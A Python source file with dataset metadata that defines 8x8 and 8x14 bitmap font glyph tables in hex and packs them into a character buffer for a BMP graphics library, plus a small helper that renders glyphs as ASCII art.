| 0.020408
| 0
| 0.037415
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
56b35093e2b3e86d6799846ab396840e9a2e1743
| 14,179
|
py
|
Python
|
source_code_gen/fontgen.py
|
TechnoTanuki/Python_BMP
|
d6f7e7a4b74f7d6e8761d618c156d37c97726038
|
[
"MIT"
] | 3
|
2022-02-24T15:46:43.000Z
|
2022-03-30T13:17:03.000Z
|
source_code_gen/fontgen.py
|
TechnoTanuki/Python_BMP
|
d6f7e7a4b74f7d6e8761d618c156d37c97726038
|
[
"MIT"
] | null | null | null |
source_code_gen/fontgen.py
|
TechnoTanuki/Python_BMP
|
d6f7e7a4b74f7d6e8761d618c156d37c97726038
|
[
"MIT"
] | null | null | null |
notice ="""
Font Generator Program
-----------------------------------
| Copyright 2022 by Joel C. Alcarez |
| [joelalcarez1975@gmail.com] |
|-----------------------------------|
| We make absolutely no warranty |
| of any kind, expressed or implied |
|-----------------------------------|
| Contact primary author |
| if you plan to use this |
| in a commercial product at |
| joelalcarez1975@gmail.com |
-----------------------------------
"""
def get8x8charpatterns() -> dict:  # add characters as needed; some ASCII chars are not present
return {' ':[0,0,0,0,0,0,0,0],
'0':[0x7C,0xC6,0xCE,0xDE,0xF6,0xE6,0x7C,0x00],
'1':[0x30,0x70,0x30,0x30,0x30,0x30,0xFC,0x00],
'2':[0x78,0xCC,0x0C,0x38,0x60,0xCC,0xFC,0x00],
'3':[0x78,0xCC,0x0C,0x38,0x0C,0xCC,0x78,0x00],
'4':[0x1C,0x3C,0x6C,0xCC,0xFE,0x0C,0x1E,0x00],
'5':[0xFC,0xC0,0xF8,0x0C,0x0C,0xCC,0x78,0x00],
'6':[0x38,0x60,0xC0,0xF8,0xCC,0xCC,0x78,0x00],
'7':[0xFC,0xCC,0x0C,0x18,0x30,0x30,0x30,0x00],
'8':[0x78,0xCC,0xCC,0x78,0xCC,0xCC,0x78,0x00],
'9':[0x78,0xCC,0xCC,0x7C,0x0C,0x18,0x70,0x00],
'A':[0x30,0x78,0xCC,0xCC,0xFC,0xCC,0xCC,0x00],
'B':[0xFC,0x66,0x66,0x7C,0x66,0x66,0xFC,0x00],
'C':[0x3C,0x66,0xC0,0xC0,0x66,0x66,0x3C,0x00],
'D':[0xF8,0x6C,0x66,0x66,0x66,0x6C,0xF8,0x00],
'E':[0xFE,0x62,0x68,0x78,0x68,0x62,0xFE,0x00],
'F':[0xFE,0x62,0x68,0x78,0x68,0x60,0xF0,0x00],
'G':[0x3C,0x66,0xC0,0xC0,0xCE,0x66,0x3E,0x00],
'H':[0xCC,0xCC,0xCC,0xFC,0xCC,0xCC,0xCC,0x00],
'I':[0x78,0x30,0x30,0x30,0x30,0x30,0x78,0x00],
'J':[0x1E,0x0C,0x0C,0x0C,0xCC,0xCC,0x78,0x00],
'K':[0xE6,0x66,0x6C,0x78,0x6C,0x66,0xE6,0x00],
'L':[0xF0,0x60,0x60,0x60,0x62,0x66,0xFE,0x00],
'M':[0xC6,0xEE,0xFE,0xFE,0xD6,0xC6,0xC6,0x00],
'N':[0xC6,0xE6,0xF6,0xDE,0xCE,0xC6,0xC6,0x00],
'O':[0x38,0x6C,0xC6,0xC6,0xC6,0x6C,0x38,0x00],
'P':[0xFC,0x66,0x66,0x7C,0x60,0x60,0xF0,0x00],
'Q':[0x78,0xCC,0xCC,0xCC,0xDC,0x78,0x1C,0x00],
'R':[0xFC,0x66,0x66,0x7C,0x6C,0x66,0xE6,0x00],
'S':[0x78,0xCC,0xE0,0x70,0x1C,0xCC,0x78,0x00],
'T':[0xFC,0xB4,0x30,0x30,0x30,0x30,0x78,0x00],
'U':[0xCC,0xCC,0xCC,0xCC,0xCC,0xCC,0x7C,0x00],
'V':[0xCC,0xCC,0xCC,0xCC,0xCC,0x78,0x30,0x00],
'W':[0xC6,0xC6,0xC6,0xD6,0xFE,0xEE,0xC6,0x00],
'X':[0xC6,0xC6,0x6C,0x38,0x38,0x6C,0xC6,0x00],
'Y':[0xCC,0xCC,0xCC,0x78,0x30,0x30,0x78,0x00],
'Z':[0xFE,0xC6,0x8C,0x18,0x32,0x66,0xFE,0x00],
'a':[0x00,0x00,0x78,0x0C,0x7C,0xCC,0x76,0x00],
'b':[0xE0,0x60,0x60,0x7C,0x66,0x66,0xDC,0x00],
'c':[0x00,0x00,0x78,0xCC,0xC0,0xCC,0x78,0x00],
'd':[0x1C,0x0C,0x0C,0x7C,0xCC,0xCC,0x76,0x00],
'e':[0x00,0x00,0x78,0xCC,0xFC,0xC0,0x78,0x00],
'f':[0x38,0x6C,0x60,0xF0,0x60,0x60,0xF0,0x00],
'g':[0x00,0x00,0x76,0xCC,0xCC,0x7C,0x0C,0xF8],
'h':[0xE0,0x60,0x6C,0x76,0x66,0x66,0xE6,0x00],
'i':[0x30,0x00,0x70,0x30,0x30,0x30,0x78,0x00],
'j':[0x0C,0x00,0x0C,0x0C,0x0C,0xCC,0xCC,0x78],
'k':[0xE0,0x60,0x66,0x6C,0x78,0x6C,0xE6,0x00],
'l':[0x70,0x30,0x30,0x30,0x30,0x30,0x78,0x00],
'm':[0x00,0x00,0xCC,0xFE,0xFE,0xD6,0xC6,0x00],
'n':[0x00,0x00,0xF8,0xCC,0xCC,0xCC,0xCC,0x00],
'o':[0x00,0x00,0x78,0xCC,0xCC,0xCC,0x78,0x00],
'p':[0x00,0x00,0xDC,0x66,0x66,0x7C,0x60,0xF0],
'q':[0x00,0x00,0x76,0xCC,0xCC,0x7C,0x0C,0x1E],
'r':[0x00,0x00,0xDC,0x76,0x66,0x60,0xF0,0x00],
's':[0x00,0x00,0x7C,0xC0,0x78,0x0C,0xF8,0x00],
't':[0x10,0x30,0x7C,0x30,0x30,0x34,0x18,0x00],
'u':[0x00,0x00,0xCC,0xCC,0xCC,0xCC,0x76,0x00],
'v':[0x00,0x00,0xCC,0xCC,0xCC,0x78,0x30,0x00],
'w':[0x00,0x00,0xC6,0xD6,0xFE,0xFE,0x6C,0x00],
'x':[0x00,0x00,0xC6,0x6C,0x38,0x6C,0xC6,0x00],
'y':[0x00,0x00,0xCC,0xCC,0xCC,0x7C,0x0C,0xF8],
'z':[0x00,0x00,0xFC,0x98,0x30,0x64,0xFC,0x00],
'<':[0x18,0x30,0x60,0xC0,0x60,0x30,0x18,0x00],
'>':[0x60,0x30,0x18,0x0C,0x18,0x30,0x60,0x00],
"(":[0x18,0x30,0x60,0x60,0x60,0x30,0x18,0x00],
")":[0x60,0x30,0x18,0x18,0x18,0x30,0x60,0x00],
'[':[0x78,0x60,0x60,0x60,0x60,0x60,0x78,0x00],
']':[0x78,0x18,0x18,0x18,0x18,0x18,0x78,0x00],
'{':[0x1C,0x30,0x30,0xE0,0x30,0x30,0x1C,0x00],
'}':[0xE0,0x30,0x30,0x1C,0x30,0x30,0xE0,0x00],
'.':[0x00,0x00,0x00,0x00,0x00,0x30,0x30,0x00],
",":[0x00,0x00,0x00,0x00,0x00,0x30,0x30,0x60],
'!':[0x30,0x78,0x78,0x30,0x30,0x00,0x30,0x00],
'?':[0x78,0xCC,0x0C,0x18,0x30,0x00,0x30,0x00],
':':[0x00,0x30,0x30,0x00,0x00,0x30,0x30,0x00],
';':[0x00,0x30,0x30,0x00,0x00,0x30,0x30,0x60],
'"':[0x6C,0x6C,0x6C,0x00,0x00,0x00,0x00,0x00],
"'":[0x60,0x60,0xC0,0x00,0x00,0x00,0x00,0x00],
'`':[0x30,0x30,0x18,0x00,0x00,0x00,0x00,0x00],
'#':[0x6C,0x6C,0xFE,0x6C,0xFE,0x6C,0x6C,0x00],
'%':[0x00,0xC6,0xCC,0x18,0x30,0x66,0xC6,0x00],
'$':[0x30,0x7C,0xC0,0x78,0x0C,0xF8,0x30,0x00],
'&':[0x38,0x6C,0x38,0x76,0xDC,0xCC,0x76,0x00],
'@':[0x7C,0xC6,0xDE,0xDE,0xDE,0xC0,0x78,0x00],
"*":[0x00,0x66,0x3C,0xFF,0x3C,0x66,0x00,0x00],
"+":[0x00,0x30,0x30,0xFC,0x30,0x30,0x00,0x00],
'-':[0x00,0x00,0x00,0xFC,0x00,0x00,0x00,0x00],
'/':[0x06,0x0C,0x18,0x30,0x60,0xC0,0x80,0x00],
'\\':[0xC0,0x60,0x30,0x18,0x0C,0x06,0x02,0x00],
'=':[0x00,0x00,0xFC,0x00,0x00,0xFC,0x00,0x00],
'^':[0x10,0x38,0x6C,0xC6,0x00,0x00,0x00,0x00],
'_':[0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xFF],
'|':[0x18,0x18,0x18,0x00,0x18,0x18,0x18,0x00],
'~':[0x76,0xDC,0x00,0x00,0x00,0x00,0x00,0x00]
}
def get8x14charpatterns() -> dict:  # add characters as needed; some ASCII chars are not present
return {' ':[0,0,0,0,0,0,0,0,0,0,0,0,0,0],
'!':[0x00,0x00,0x18,0x18,0x18,0x18,0x18,0x18,0x00,0x00,0x18,0x00,0x00,0x00],
'"':[0x00,0x66,0x66,0x66,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00],
'#':[0x00,0x00,0x6C,0x6C,0xFE,0x6C,0x6C,0x6C,0xFE,0x6C,0x6C,0x00,0x00,0x00],
'$':[0x00,0x10,0x7C,0xD6,0xD0,0xD0,0x7C,0x16,0x16,0xD6,0x7C,0x10,0x00,0x00],
'%':[0x00,0x00,0x00,0x00,0xC2,0xC4,0x08,0x10,0x20,0x46,0x86,0x00,0x00,0x00],
'&':[0x00,0x00,0x38,0x6C,0x6C,0x38,0x76,0xDC,0xCC,0xCC,0x76,0x00,0x00,0x00],
"'":[0x00,0x30,0x30,0x30,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00],
'(':[0x00,0x00,0x0C,0x18,0x30,0x30,0x30,0x30,0x30,0x18,0x0C,0x00,0x00,0x00],
')':[0x00,0x00,0x30,0x18,0x0C,0x0C,0x0C,0x0C,0x0C,0x18,0x30,0x00,0x00,0x00],
'*':[0x00,0x00,0x00,0x00,0x66,0x3C,0xFF,0x3C,0x66,0x00,0x00,0x00,0x00,0x00],
'+':[0x00,0x00,0x00,0x00,0x18,0x18,0x7E,0x18,0x18,0x00,0x00,0x00,0x00,0x00],
',':[0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x1C,0x18,0x30,0x00,0x00],
'-':[0x00,0x00,0x00,0x00,0x00,0x00,0xFC,0x00,0x00,0x00,0x00,0x00,0x00,0x00],
'.':[0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x18,0x00,0x00,0x00],
'/':[0x00,0x00,0x02,0x06,0x0C,0x18,0x30,0x60,0xC0,0x80,0x00,0x00,0x00,0x00],
'0':[0x00,0x00,0x7C,0xC6,0xC6,0xC6,0xD6,0xC6,0xC6,0xC6,0x7C,0x00,0x00,0x00],
'1':[0x00,0x00,0x18,0x38,0x18,0x18,0x18,0x18,0x18,0x18,0x7E,0x00,0x00,0x00],
'2':[0x00,0x00,0x7C,0xC6,0x06,0x0C,0x18,0x30,0x60,0xC0,0xFE,0x00,0x00,0x00],
'3':[0x00,0x00,0x7C,0xC6,0x06,0x06,0x3C,0x06,0x06,0xC6,0x7C,0x00,0x00,0x00],
'4':[0x00,0x00,0x0C,0x1C,0x3C,0x6C,0xCC,0xFE,0x0C,0x0C,0x0C,0x00,0x00,0x00],
'5':[0x00,0x00,0xFE,0xC0,0xC0,0xC0,0xFC,0x06,0x06,0xC6,0x7C,0x00,0x00,0x00],
'6':[0x00,0x00,0x3C,0x60,0xC0,0xC0,0xFC,0xC6,0xC6,0xC6,0x7E,0x00,0x00,0x00],
'7':[0x00,0x00,0xFE,0x06,0x06,0x0C,0x18,0x30,0x30,0x30,0x30,0x00,0x00,0x00],
'8':[0x00,0x00,0x7C,0xC6,0xC6,0xC6,0x7C,0xC6,0xC6,0xC6,0x7C,0x00,0x00,0x00],
'9':[0x00,0x00,0x7C,0xC6,0xC6,0xC6,0x7E,0x06,0x06,0x0C,0x78,0x00,0x00,0x00],
':':[0x00,0x00,0x00,0x18,0x18,0x00,0x00,0x00,0x18,0x18,0x00,0x00,0x00,0x00],
';':[0x00,0x00,0x00,0x18,0x18,0x00,0x00,0x00,0x18,0x18,0x30,0x00,0x00,0x00],
'<':[0x00,0x00,0x06,0x0C,0x18,0x30,0x60,0x30,0x18,0x0C,0x06,0x00,0x00,0x00],
'=':[0x00,0x00,0x00,0x00,0x00,0x7E,0x00,0x00,0x7E,0x00,0x00,0x00,0x00,0x00],
'>':[0x00,0x00,0x60,0x30,0x18,0x0C,0x06,0x0C,0x18,0x30,0x60,0x00,0x00,0x00],
'?':[0x00,0x00,0x7C,0xC6,0x06,0x0C,0x18,0x18,0x18,0x00,0x00,0x18,0x00,0x00],
'@':[0x00,0x00,0x7C,0xC6,0xC6,0xC6,0xDE,0xDE,0xDE,0xC0,0x7C,0x00,0x00,0x00],
'A':[0x00,0x00,0x10,0x38,0x6C,0xC6,0xC6,0xFE,0xC6,0xC6,0xC6,0x00,0x00,0x00],
'B':[0x00,0x00,0xFC,0xC6,0xC6,0xC6,0xFC,0xC6,0xC6,0xC6,0xFC,0x00,0x00,0x00],
'C':[0x00,0x00,0x3C,0x66,0xC0,0xC0,0xC0,0xC0,0xC0,0x66,0x3C,0x00,0x00,0x00],
'D':[0x00,0x00,0xF8,0xCC,0xC6,0xC6,0xC6,0xC6,0xC6,0xCC,0xF8,0x00,0x00,0x00],
'E':[0x00,0x00,0xFE,0xC0,0xC0,0xC0,0xFC,0xC0,0xC0,0xC0,0xFE,0x00,0x00,0x00],
'F':[0x00,0x00,0xFE,0xC0,0xC0,0xC0,0xFC,0xC0,0xC0,0xC0,0xC0,0x00,0x00,0x00],
'G':[0x00,0x00,0x3C,0x66,0xC0,0xC0,0xC0,0xCE,0xC6,0x66,0x3C,0x00,0x00,0x00],
'H':[0x00,0x00,0xC6,0xC6,0xC6,0xC6,0xFE,0xC6,0xC6,0xC6,0xC6,0x00,0x00,0x00],
'I':[0x00,0x00,0x3C,0x18,0x18,0x18,0x18,0x18,0x18,0x18,0x3C,0x00,0x00,0x00],
'J':[0x00,0x00,0x1E,0x0C,0x0C,0x0C,0x0C,0x0C,0x0C,0x0C,0x78,0x00,0x00,0x00],
'K':[0x00,0x00,0xC6,0xCC,0xD8,0xF0,0xE0,0xF0,0xD8,0xCC,0xC6,0x00,0x00,0x00],
'L':[0x00,0x00,0xC0,0xC0,0xC0,0xC0,0xC0,0xC0,0xC0,0xC0,0xFE,0x00,0x00,0x00],
'M':[0x00,0x00,0xC6,0xEE,0xFE,0xFE,0xD6,0xC6,0xC6,0xC6,0xC6,0x00,0x00,0x00],
'N':[0x00,0x00,0xC6,0xE6,0xF6,0xFE,0xDE,0xCE,0xC6,0xC6,0xC6,0x00,0x00,0x00],
'O':[0x00,0x00,0x7C,0xC6,0xC6,0xC6,0xC6,0xC6,0xC6,0xC6,0x7C,0x00,0x00,0x00],
'P':[0x00,0x00,0xFC,0xC6,0xC6,0xC6,0xFC,0xC0,0xC0,0xC0,0xC0,0x00,0x00,0x00],
'Q':[0x00,0x00,0x7C,0xC6,0xC6,0xC6,0xC6,0xC6,0xD6,0xCC,0x7A,0x00,0x00,0x00],
'R':[0x00,0x00,0xFC,0xC6,0xC6,0xC6,0xFC,0xD8,0xCC,0xC6,0xC6,0x00,0x00,0x00],
'S':[0x00,0x00,0x7C,0xC6,0xC0,0x60,0x38,0x0C,0x06,0xC6,0x7C,0x00,0x00,0x00],
'T':[0x00,0x00,0x7E,0x18,0x18,0x18,0x18,0x18,0x18,0x18,0x18,0x00,0x00,0x00],
'U':[0x00,0x00,0xC6,0xC6,0xC6,0xC6,0xC6,0xC6,0xC6,0xC6,0x7C,0x00,0x00,0x00],
'V':[0x00,0x00,0xC6,0xC6,0xC6,0xC6,0xC6,0xC6,0x6C,0x38,0x10,0x00,0x00,0x00],
'W':[0x00,0x00,0xC6,0xC6,0xC6,0xC6,0xD6,0xD6,0xFE,0xEE,0xC6,0x00,0x00,0x00],
'X':[0x00,0x00,0xC6,0xC6,0x6C,0x38,0x10,0x38,0x6C,0xC6,0xC6,0x00,0x00,0x00],
'Y':[0x00,0x00,0x66,0x66,0x66,0x66,0x3C,0x18,0x18,0x18,0x18,0x00,0x00,0x00],
'Z':[0x00,0x00,0xFE,0x06,0x0C,0x18,0x30,0x60,0xC0,0xC0,0xFE,0x00,0x00,0x00],
'[':[0x00,0x00,0x3C,0x30,0x30,0x30,0x30,0x30,0x30,0x30,0x3C,0x00,0x00,0x00],
'\\':[0x00,0x00,0x00,0x80,0xC0,0x60,0x30,0x18,0x0C,0x06,0x02,0x00,0x00,0x00],
']':[0x00,0x00,0x3C,0x0C,0x0C,0x0C,0x0C,0x0C,0x0C,0x0C,0x3C,0x00,0x00,0x00],
'^':[0x10,0x38,0x6C,0xC6,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00],
'_':[0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xFE,0x00],
'`':[0x30,0x30,0x18,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00],
'a':[0x00,0x00,0x00,0x00,0x00,0x7C,0x06,0x7E,0xC6,0xC6,0x7E,0x00,0x00,0x00],
'b':[0x00,0x00,0xC0,0xC0,0xC0,0xFC,0xC6,0xC6,0xC6,0xC6,0xFC,0x00,0x00,0x00],
'c':[0x00,0x00,0x00,0x00,0x00,0x7C,0xC6,0xC0,0xC0,0xC6,0x7C,0x00,0x00,0x00],
'd':[0x00,0x00,0x06,0x06,0x06,0x7E,0xC6,0xC6,0xC6,0xC6,0x7E,0x00,0x00,0x00],
'e':[0x00,0x00,0x00,0x00,0x00,0x7C,0xC6,0xFE,0xC0,0xC6,0x7C,0x00,0x00,0x00],
'f':[0x00,0x00,0x3C,0x66,0x60,0x60,0xF0,0x60,0x60,0x60,0x60,0x00,0x00,0x00],
'g':[0x00,0x00,0x00,0x00,0x00,0x7E,0xC6,0xC6,0xC6,0x7E,0x06,0x06,0x06,0x7C],
'h':[0x00,0x00,0xC0,0xC0,0xC0,0xFC,0xC6,0xC6,0xC6,0xC6,0xC6,0x00,0x00,0x00],
'i':[0x00,0x00,0x18,0x18,0x00,0x00,0x18,0x18,0x18,0x18,0x18,0x00,0x00,0x00],
'j':[0x00,0x00,0x06,0x06,0x00,0x00,0x06,0x06,0x06,0x06,0x06,0x06,0xC6,0x7C],
'k':[0x00,0x00,0xC0,0xC0,0xC0,0xCC,0xD8,0xF0,0xD8,0xCC,0xC6,0x00,0x00,0x00],
'l':[0x00,0x00,0x38,0x18,0x18,0x18,0x18,0x18,0x18,0x18,0x3C,0x00,0x00,0x00],
'm':[0x00,0x00,0x00,0x00,0x00,0xEC,0xD6,0xD6,0xD6,0xD6,0xC6,0x00,0x00,0x00],
'n':[0x00,0x00,0x00,0x00,0x00,0xFC,0xC6,0xC6,0xC6,0xC6,0xC6,0x00,0x00,0x00],
'o':[0x00,0x00,0x00,0x00,0x00,0x7C,0xC6,0xC6,0xC6,0xC6,0x7C,0x00,0x00,0x00],
'p':[0x00,0x00,0x00,0x00,0x00,0xFC,0xC6,0xC6,0xC6,0xC6,0xFC,0xC0,0xC0,0xC0],
'q':[0x00,0x00,0x00,0x00,0x00,0x7E,0xC6,0xC6,0xC6,0xC6,0x7E,0x06,0x06,0x06],
'r':[0x00,0x00,0x00,0x00,0x00,0xFC,0xC6,0xC0,0xC0,0xC0,0XC0,0x00,0x00,0x00],
's':[0x00,0x00,0x00,0x00,0x00,0x7C,0xC0,0x70,0x1C,0x06,0x7C,0x00,0x00,0x00],
't':[0x00,0x00,0x30,0x30,0xFC,0x30,0x30,0x30,0x30,0x30,0x1C,0x00,0x00,0x00],
'u':[0x00,0x00,0x00,0x00,0x00,0xC6,0xC6,0xC6,0xC6,0xC6,0x7C,0x00,0x00,0x00],
'v':[0x00,0x00,0x00,0x00,0x00,0xC6,0xC6,0xC6,0x6C,0x38,0x10,0x00,0x00,0x00],
'w':[0x00,0x00,0x00,0x00,0x00,0xC6,0xC6,0xD6,0xD6,0xFE,0xC6,0x00,0x00,0x00],
'x':[0x00,0x00,0x00,0x00,0x00,0xC6,0x6C,0x38,0x38,0x6C,0xC6,0x00,0x00,0x00],
'y':[0x00,0x00,0x00,0x00,0x00,0xC6,0xC6,0xC6,0xC6,0xC6,0x7E,0x06,0x06,0x7C],
'z':[0x00,0x00,0x00,0x00,0x00,0xFE,0x0C,0x18,0x30,0x60,0xFE,0x00,0x00,0x00],
'{':[0x00,0x00,0x0E,0x18,0x18,0x18,0x60,0x18,0x18,0x18,0x0E,0x00,0x00,0x00],
'|':[0x00,0x00,0x18,0x18,0x18,0X18,0x00,0x18,0x18,0x18,0x18,0x00,0x00,0x00],
'}':[0x00,0x00,0x70,0x18,0x18,0X18,0x06,0x18,0x18,0x18,0x70,0x00,0x00,0x00],
'~':[0x76,0xDC,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00]
}
def makecharbuf(
        chardict: dict) -> list:
    charlen = len(chardict['0'])
    b = [charlen]
    blankchar = [0 for _ in range(charlen)]
    for i in range(256):
        c = chardict.get(chr(i), blankchar)
        b += c
    return b


def main():
    print(notice)
    print(makecharbuf(
        get8x8charpatterns()))
    print(makecharbuf(
        get8x14charpatterns()))


if __name__ == "__main__":
    main()
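# --- Editorial illustration (not in the original file) ---
# Each entry in the pattern dicts above is a list of row bytes, one bit per
# pixel with the most significant bit on the left and the top row first. The
# helper below renders a glyph as ASCII art so the encoding is easy to verify.
def showglyph(rows):
    for row in rows:
        print(''.join('#' if row & (0x80 >> bit) else '.' for bit in range(8)))

# Example: showglyph(get8x8charpatterns()['A']) prints an 8x8 letter 'A'.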
| 60.33617
| 89
| 0.636646
| 2,327
| 14,179
| 3.874517
| 0.067469
| 0.454303
| 0.423248
| 0.354925
| 0.695763
| 0.59106
| 0.472826
| 0.30823
| 0.266526
| 0.225488
| 0
| 0.429264
| 0.127089
| 14,179
| 234
| 90
| 60.594017
| 0.299184
| 0.007546
| 0
| 0.026549
| 0
| 0
| 0.048831
| 0.013931
| 0
| 1
| 0.587959
| 0
| 0
| 1
| 0.017699
| false
| 0
| 0
| 0.00885
| 0.030973
| 0.013274
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|